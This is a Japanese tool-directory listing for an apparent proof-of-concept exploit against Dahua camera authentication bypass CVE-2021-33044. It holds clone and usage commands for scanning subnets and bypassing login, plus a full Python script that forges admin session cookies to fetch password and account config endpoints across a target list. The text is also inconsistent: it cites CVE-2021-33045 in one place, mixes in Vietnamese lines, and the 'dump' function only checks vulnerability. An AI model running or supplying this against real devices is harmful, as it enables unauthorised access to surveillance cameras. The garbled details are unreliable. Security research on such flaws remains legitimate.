Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — Dahua認証バイパス(CVE-2021-33044)のPoCエクスプロイト。サブネットをスキャンし、複数のCVEをテストし、有効な資格情報なしで巧妙なクッキーを介してデバイス設定をダンプします。 | Kitploit
ツール/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
認証と認可IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Dahua認証バイパス(CVE-2021-33044)のPoCエクスプロイト。サブネットをスキャンし、複数のCVEをテストし、有効な資格情報なしで巧妙なクッキーを介してデバイス設定をダンプします。

リポジトリを見る
185ヶ月前未レビュー

Dahua Authentication Bypass PoC (CVE-2021-33044) エクスプロイトシミュレーション

概要

Dahua IPカメラはセキュリティ監視システムで広く使用されているIoTデバイスです。内部ネットワークやインターネット経由でのアクセスが頻繁に行われるため、IPカメラの脆弱性はプライバシーと情報セキュリティに深刻な影響を与える可能性があります。

CVE-2021-33045は、一部のDahuaカメラに存在するセキュリティ脆弱性であり、正当な認証なしに内部設定リソースへの不正アクセスを可能にします。この脆弱性は、デバイスのファームウェアにおける不十分なアクセス制御メカニズムに起因します。

脆弱性情報

項目内容
CVECVE-2021-33044
種類Authentication Bypass
重要度Critical (CVSS ~9.8)
認証認証不要
影響Dahua Camera / DVR / NVR

原因

脆弱性は、Dahuaカメラのファームウェアにおける安全でない認証設計に起因します:

  • サーバーがセッション/トークンを適切に検証しない
  • クライアントから送信されたデータを信頼する
  • 一部の機密設定エンドポイントは、Cookieの存在のみをチェックし、実際のアクセス権限を検証しない

これにより攻撃者は以下が可能:

  • 認証プロセスのなりすまし
  • ログイン完全バイパス

参照:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

認証バイパスメカニズムの動作方法

通常フロー

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

スクリプト一覧

ファイル

使用方法

インストール

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

ネットワークスキャン

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

一般的なDahuaポート: 80,443, 8080, 37777, 37778

CVE脆弱性のエクスプロイト

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

認証バイパス

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

例

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

解説

  • スクリプトはrequestsライブラリを使用し、SSL警告を無効にするために積極的にSSL警告をオフにします。

  • dump_accounts(ip, port=80)関数は、1台のカメラデバイスをチェックする主要な関数です。 この関数の主な機能は次のとおりです:

    • IPアドレスとポートからURLを構築
    • Cookieを介して管理者ログイン状態を偽装
    • 機密設定エンドポイントにリクエストを送信
    • 応答を分析してデバイスが脆弱かどうかを判断
  • 認証Cookieの偽装。関数は次のCookie値を使用します:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • 影響を受けるカメラバージョンでは、バックエンドが実際のsessionIDを検証しないため、システムはリクエストが有効な管理者アカウントから送信されたと信じてしまいます。

ターゲットリスト処理のループ

スクリプトは入力ファイルからターゲットリストを読み取り、各デバイスに対してチェック関数を順次呼び出します。このアプローチにより、複数のカメラを自動的に評価できます。

image

開発プロセス

これらのスクリプトは以下に基づいて開発されました:

  • NVDから公開されたCVE詳細
  • Dahuaのセキュリティ通知
  • 公開されているPoCリファレンス(seclists.org、packetstormsecurity)

テスト状況:

  • 認証バイパスロジックはCVE仕様に従って実装
  • 脆弱なデバイスでの限定的なテスト

注意事項

このプロジェクトは:

  • 学習および研究目的のみに使用
  • 個人のラボ環境で実行してください
ツールをダウンロード
目的
CVEs
dahua_scanner.pyネットワーク探索 — サブネット上のDahuaカメラを検出検出
dahua_exploit.pyマルチCVEスキャンツール — すべてのセキュリティ脆弱性をチェックすべて
dahua_auth_bypass.py専用認証バイパス(--dumpオプションあり)CVE-2021-33044